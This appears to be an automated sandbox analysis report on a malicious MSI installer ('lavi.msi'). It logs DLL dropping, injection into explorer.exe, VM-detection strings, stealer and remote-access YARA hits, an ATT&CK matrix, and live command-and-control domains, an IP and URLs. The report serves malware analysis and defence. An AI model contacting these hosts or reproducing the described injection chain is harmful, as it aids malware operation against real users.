            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\rundll32.exe | Code function: GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001A9942B4D00
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,wsprintfA,wsprintfA,wsprintfA,GetComputerNameExA,wsprintfA,GetComputerNameExA,wsprintfA,11_2_02BE8424
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,11_2_02BE7274
            Source: C:\Windows\explorer.exe | Code function: GetAdaptersInfo,11_2_02BF0610
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 404
            Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 8779
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 883
            Source: C:\Windows\explorer.exe | Window / User API: foregroundWindowGot 874
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI25B6.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI2586.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\apptext.dll
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI2527.tmp
            Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSI25D6.tmp
            Source: C:\Windows\Installer\MSI2701.tmp | Check user administrative privileges: GetTokenInformation, DecisionNodes graph_4-33740
            Source: C:\Windows\System32\rundll32.exe | Check user administrative privileges: GetTokenInformation, DecisionNodes graph_6-26092
            Source: C:\Windows\Installer\MSI2701.tmp | API coverage: 6.7 %
            Source: C:\Windows\explorer.exe TID: 3572 | Thread sleep count: 306 > 30
            Source: C:\Windows\explorer.exe TID: 3572 | Thread sleep time: -306000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1012 | Thread sleep count: 404 > 30
            Source: C:\Windows\explorer.exe TID: 1012 | Thread sleep time: -40400s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3572 | Thread sleep count: 8779 > 30
            Source: C:\Windows\explorer.exe TID: 3572 | Thread sleep time: -8779000s >= -30000s
            Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004FAF79 FindFirstFileExW,4_2_004FAF79
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BEA8E0 FindFirstFileW,FindNextFileW,LoadLibraryW,LoadLibraryExW,11_2_02BEA8E0
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04B8 FindFirstFileA,11_2_02BF04B8
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF04C0 FindFirstFileW,11_2_02BF04C0
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BE2B28 FindFirstFileA,wsprintfA,FindNextFileA,FindClose,11_2_02BE2B28
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWystem32\DriverStore\en\volume.inf_loc
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
            Source: explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTcaVMWare
            Source: explorer.exe, 0000000B.00000003.2866219437.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}F
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00=
            Source: rundll32.exe, 00000006.00000002.3893692135.000001A992847000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1460394613.000001A9927F3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2285809473.000001A992847000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.0000000009255000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
            Source: explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
            Source: explorer.exe, 0000000B.00000003.2866219437.0000000009330000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.2291389093.0000000009267000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
            Source: explorer.exe, 0000000B.00000002.3892851746.0000000000A28000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A99429CCE0 LdrGetProcedureAddress,6_2_000001A99429CCE0
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004CD0A5 IsDebuggerPresent,OutputDebugStringW,4_2_004CD0A5
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000000018001F790 OutputDebugStringA,ActivateActCtx,GetLastError,6_2_000000018001F790
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D2C10 LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_00000001800D2C10
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004FAD78 mov eax, dword ptr fs:[00000030h] 4_2_004FAD78
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F2DCC mov ecx, dword ptr fs:[00000030h] 4_2_004F2DCC
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C2310 GetProcessHeap,4_2_004C2310
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSI2701.tmp "C:\Windows\Installer\MSI2701.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\apptext.dll, Object
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E33A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004E33A8
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E353F SetUnhandledExceptionFilter,4_2_004E353F
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E2968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_004E2968
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E6E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_004E6E1B
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800D50A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00000001800D50A0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_00000001800DBA64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800DBA64

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\rundll32.exe | Network Connect: 80.66.76.106 8877
            Source: C:\Windows\System32\rundll32.exe | Memory allocated: C:\Windows\explorer.exe base: 2BE0000 protect: page execute and read and write
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_3_00007DF4BD330100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF4BD330100
            Source: C:\Windows\System32\rundll32.exe | Thread created: C:\Windows\explorer.exe EIP: 2BE0000
            Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 2BE0000 value starts with: 4D5A
            Source: C:\Windows\System32\rundll32.exe | Memory written: PID: 4084 base: 2BE0000 value: 4D
            Source: C:\Windows\System32\rundll32.exe | Thread register set: 8104 1
            Source: C:\Windows\System32\rundll32.exe | Memory written: C:\Windows\explorer.exe base: 2BE0000
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004C52F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_004C52F0
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_0000000180001510 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,6_2_0000000180001510
            Source: explorer.exe, 0000000B.00000000.2291677099.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 0000000B.00000000.2287787419.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
            Source: explorer.exe, 0000000B.00000002.3893948918.0000000001090000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2288251539.0000000001091000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: explorer.exe, 0000000B.00000000.2291677099.000000000937B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.000000000936E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd]1Q
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E35A9 cpuid 4_2_004E35A9
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: EnumSystemLocalesW,4_2_004FE0C6
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: EnumSystemLocalesW,4_2_004FE111
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: EnumSystemLocalesW,4_2_004F7132
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: EnumSystemLocalesW,4_2_004FE1AC
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_004FE237
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoEx,4_2_004E23F8
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoW,4_2_004FE48A
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_004FE5B3
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoW,4_2_004F76AF
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetLocaleInfoW,4_2_004FE6B9
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_004FE788
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_004FDE24
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800FA4C8
            Source: C:\Windows\System32\rundll32.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_00000001800FA160
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800FA598
            Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_00000001800FA9D8
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,6_2_00000001800EFEA8
            Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,6_2_00000001800F0328
            Source: C:\Windows\System32\rundll32.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_00000001800FABBC
            Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004E37D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_004E37D5
            Source: C:\Windows\System32\rundll32.exe | Code function: 6_2_000001A9942B4D00 GetUserNameW,GetComputerNameExW,GetComputerNameExW,GetTokenInformation,GetNativeSystemInfo,GetAdaptersInfo,GetAdaptersInfo,6_2_000001A9942B4D00
            Source: C:\Windows\Installer\MSI2701.tmp | Code function: 4_2_004F7B1F GetTimeZoneInformation,4_2_004F7B1F
            Source: C:\Windows\explorer.exe | Code function: 11_2_02BF00E8 RtlGetVersion,11_2_02BF00E8

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 8104, type: MEMORYSTR
            Source: Yara match | File source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.3893692135.000001A9927C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 8104, type: MEMORYSTR
            Source: Yara match | File source: 00000006.00000003.2286244860.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000003.2286424940.000001A9946EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3902483361.000000000AB4C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: explorer.exe PID: 4084, type: MEMORYSTR
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            MITRE ATT&CK Matrix (numbers give the count of matching signatures per technique)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 82 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Masquerading | Cached Domain Credentials | 31 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 82 Process Injection | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
            Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
            Behavior Graph ID: 1555052 | Sample: lavi.msi | Startdate: 13/11/2024 | Architecture: WINDOWS | Score: 100
            Domains contacted: xomamox.com, rolefenik.com
            Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 6 other signatures
            Processes started from the sample: rundll32.exe; msiexec.exe; msiexec.exe
            rundll32.exe -> started rundll32.exe
            msiexec.exe -> dropped C:\Windows\Installer\MSI2701.tmp (PE32); C:\Users\user\AppData\Roaming\apptext.dll (PE32+); C:\Windows\Installer\MSI25D6.tmp (PE32); 3 other files (none is malicious)
            msiexec.exe -> signature: Drops executables to the windows directory (C:\Windows) and starts them
            msiexec.exe -> started msiexec.exe; MSI2701.tmp
            rundll32.exe (child) -> network: xomamox.com 80.66.76.106, ports 49705, 58081, 58085, VAD-SRL-AS1MD, Russian Federation
            rundll32.exe (child) -> signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to inject threads in other processes; Injects code into the Windows Explorer (explorer.exe); 5 other signatures
            rundll32.exe (child) -> injected explorer.exe
            explorer.exe -> network: rolefenik.com 172.67.191.232, ports 443, 58086, 58087, CLOUDFLARENETUS, United States

            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            C:\Users\user\AppData\Roaming\apptext.dll | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI2527.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI2586.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI25B6.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI25D6.tmp | 0% | ReversingLabs | |
            C:\Windows\Installer\MSI2701.tmp | 0% | ReversingLabs | |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://xomamox.com:8877/49 | 100% | Avira URL Cloud | malware |
            https://xomamox.com:8877/gump.phpx | 100% | Avira URL Cloud | malware |
            https://rolefenik.com/test/W | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/Q | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/O | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/ | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/xtMenuArray_198721XV | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/v | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/ser-l1-1-0 | 0% | Avira URL Cloud | safe |
            https://xomamox.com:8877/gump.php | 100% | Avira URL Cloud | malware |
            https://xomamox.com:8877/forest.phpl | 100% | Avira URL Cloud | malware |
            https://rolefenik.com/= | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/test/ | 0% | Avira URL Cloud | safe |
            https://rolefenik.com/0 | 0% | Avira URL Cloud | safe |
            https://xomamox.com:8877/forest.php | 100% | Avira URL Cloud | malware |
            https://rolefenik.com/F | 0% | Avira URL Cloud | safe |
            https://xomamox.com:8877/re | 100% | Avira URL Cloud | malware |
            https://ergiholim.com/test/ | 0% | Avira URL Cloud | safe |
            https://xomamox.com:8877/gump.php- | 100% | Avira URL Cloud | malware |
            https://xomamox.com:8877/ | 100% | Avira URL Cloud | malware |
            https://xomamox.com/ | 100% | Avira URL Cloud | malware |
            https://rolefenik.com/test/: | 0% | Avira URL Cloud | safe |
            https://xomamox.com:8877/T | 100% | Avira URL Cloud | malware |
            NameIPActiveMaliciousAntivirus DetectionReputation
            rolefenik.com
            172.67.191.232
            truefalse
              high
              xomamox.com
              80.66.76.106
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                https://rolefenik.com/test/true
                • Avira URL Cloud: safe
                unknown
                https://ergiholim.com/test/true
                • Avira URL Cloud: safe
                unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.msn.com/v1/news/Feed/Windows? | explorer.exe, 0000000B.00000000.2290826677.00000000090DA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3900236624.00000000090DA000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.comer | explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOSA4 | explorer.exe, 0000000B.00000002.3903919653.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2294125458.000000000BC80000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 0000000B.00000002.3900236624.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2290826677.00000000091FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/ | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/Q | explorer.exe, 0000000B.00000002.3908508770.000000000C0FD000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://rolefenik.com/test/O | explorer.exe, 0000000B.00000002.3903919653.000000000BDA9000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xomamox.com:8877/49 | rundll32.exe, 00000006.00000002.3893692135.000001A992861000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://excel.office.com | explorer.exe, 0000000B.00000000.2294093045.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3903919653.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1 | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://schemas.micro | explorer.exe, 0000000B.00000002.3898266932.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3898287903.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.3894546786.0000000002C80000.00000002.00000001.00040000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg | explorer.exe, 0000000B.00000002.3896365823.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2289564876.0000000006F09000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://wns.windows.com/EM0 | explorer.exe, 0000000B.00000000.2294125458.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://rolefenik.com/test/W | explorer.exe, 0000000B.00000002.3900236624.0000000009330000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
